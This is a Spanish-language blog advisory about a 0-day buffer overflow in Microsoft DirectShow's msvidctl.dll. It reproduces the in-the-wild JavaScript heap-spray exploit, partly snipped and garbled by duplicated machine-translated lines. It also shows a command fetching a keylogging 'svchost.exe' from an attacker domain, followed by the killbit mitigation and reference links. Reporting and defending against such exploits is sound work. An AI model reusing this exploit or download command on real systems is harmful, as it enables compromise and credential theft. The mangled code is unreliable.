0 day en Microsoft DirectShow
Se ha encontrado una vulnerabilidad 0 day en la librería msvidctl.dll que permite un desbordamiento de la memoria intermedia basado en la función ‘MPEG2TuneRequest’ de dicha librería. Esto permite la ejecución de código arbitrario con los permisos de usuario que está ejecutando el navegador.
El exploit, que se añade a los sitios comprometidos fuerza al usuario a visitar el dominio (añado espacios en blanco) y descargar 8oy4 t.8 866 . org/ aa / go.jpg explotando diversas vulnerabilidades.
Los detalles del exploit los detallo a continuación:
was appllaa =’0 ‘;
var nndx=’%'+’u9′+’0′+’9′+’0′+’%u’+’9′+’0′+’9′+appllaa; was nndx =’%'+’ U9 ‘+’0′ +’9 ‘+’0′ + ‘% u’ +’9 ‘+’0′ +’9 ‘+ appllaa;
var dashell=unescape(nndx+”%u03eb%ueb59%ue805 was dashell = unescape (nndx + “% u03eb% ueb59% ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949″ + % ufff8% uffff% u4937% u4949% u4949% u4949% u4949 “+
” + [SNIP] “+ [SNIP]
var headersize=20; var header size = 20;
var omybro=unescape(nndx); was omybro = unescape (nndx);
var slackspace=headersize+dashell.length; was slackspace = header size + dashell.length;
while(omybro.length<slackspace) while (omybro.length <slackspace)
omybro+=omybro; omybro + = omybro;
bZmybr=omybro.substring(0,slackspace); bZmybr = omybro.substring (0, slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace); shuishiMVP = omybro.substring (0, omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0×30000) while (shuishiMVP.length + slackspace <0×30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array(); shuishiMVP = sh uishiMVP + sh uishiMVP + bZmybr; memory = new Array ();
for(x=0;x<300;x++) for (x = 0, x <300; x + +)
memory[x]=shuishiMVP+dashell; memory [x] = shuishiMVP + dashell;
var myObject=document.createElement(‘object’); var myObject = document.createElement ( ‘object’);
DivID.appendChild(myObject); DivID.appendChild (myObject);
myObject.width=’1′; myObject.width =’1 ‘;
myObject.height=’1′; myObject.height =’1 ‘;
myObject.data=’./logo.gif’; myObject.data = ‘. / logo.gif’;
myObject.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’; myObject.classid = ‘clsid: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;
El código llama al shell para descargar y correr el siguiente código malicioso:
C:\[% programfiles%]\ Internet Explorer\iexplore.exe “http: // mil l lk.com /wm /svchost .exe
Una vez corrido este svchost.exe y sustituído en el sistema vulnerable, empieza a capturar todas las teclas que se teclean en el teclado e instala toda una amalgama de bots y código malicioso en el sistema vulnerable.
Esta vulnerabilidad puede ser explotada en muchas versiones de Microsoft Windows incluyendo 2000, 2003 y XP y la única contramedia posible es activando el killbit del control de la librería.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400
Por el momento hay dos vulnerabilidades 0 day sin resolver en Microsoft Windows, una que afecta a los videos de quicktime y esta nueva vulnerabilidad. En el caso de la primera no hay exploit público.
Más información en:
CSIS http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799
SANS http://isc.sans.org/diary.html?storyid=6733
Hispasec http://www.hispasec.com/unaaldia/3907/
